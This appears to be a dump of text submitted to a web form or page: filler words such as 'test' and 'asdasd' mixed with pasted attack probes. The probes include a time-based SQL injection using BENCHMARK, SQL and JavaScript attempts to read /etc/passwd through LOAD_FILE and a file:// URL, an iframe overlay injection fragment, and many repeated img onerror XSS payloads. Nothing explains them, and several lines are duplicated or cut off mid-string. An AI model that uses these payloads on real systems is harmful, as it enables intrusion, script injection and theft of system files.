testSELECT 1 WHERE (SELECT BENCHMARK(100000000, MD5('A'))); https://blog.dixitaditya.com/xss-to-read-internal-files LFI === openURL("file:///etc/passwd","new tab"); return ""; SELECT CAST(LOAD_FILE
SELECT 1 WHERE (SELECT BENCHMARK(100000000, MD5('A'))); https://blog.dixitaditya.com/xss-to-read-internal-files LFI === openURL("file:///etc/passwd","new tab"); return ""; SELECT CAST(LOAD_FILE('/etc/passwd','UTF-8') AS VARCHAR(10000)) AS file_content
asdasd
<html> <head> <style>.a{ background: var(-abc, rgb(255, 255, 255),"</style><iframe id=xxx style=border:none;position:fixed;top:0;left:0;width:100%;height:100% srcdoc='","<html style=height:100%;width:100%;background-color:green;opacity:0.5
'"><img src=x onerror=alert(1111)>
'"><img src=x onerror=alert(1111)>
'"><img src=x onerror=prompt(1)>
'">
<img src=x onerror=alert(1)>
<img src=x onerror=alert(1)>
'"><img src=x onerror=alert(1)>
'"><img src=x onerror=alert(1)>
<img src=x onerror=alert(2)>
<img src=x onerror=alert(2)>
hahah
gasfasd
'"><img src=x onerror=alert(1)>
'"><img src=x onerror=alert(1)>
asdasd
asdasd
pre test
test
Testing
test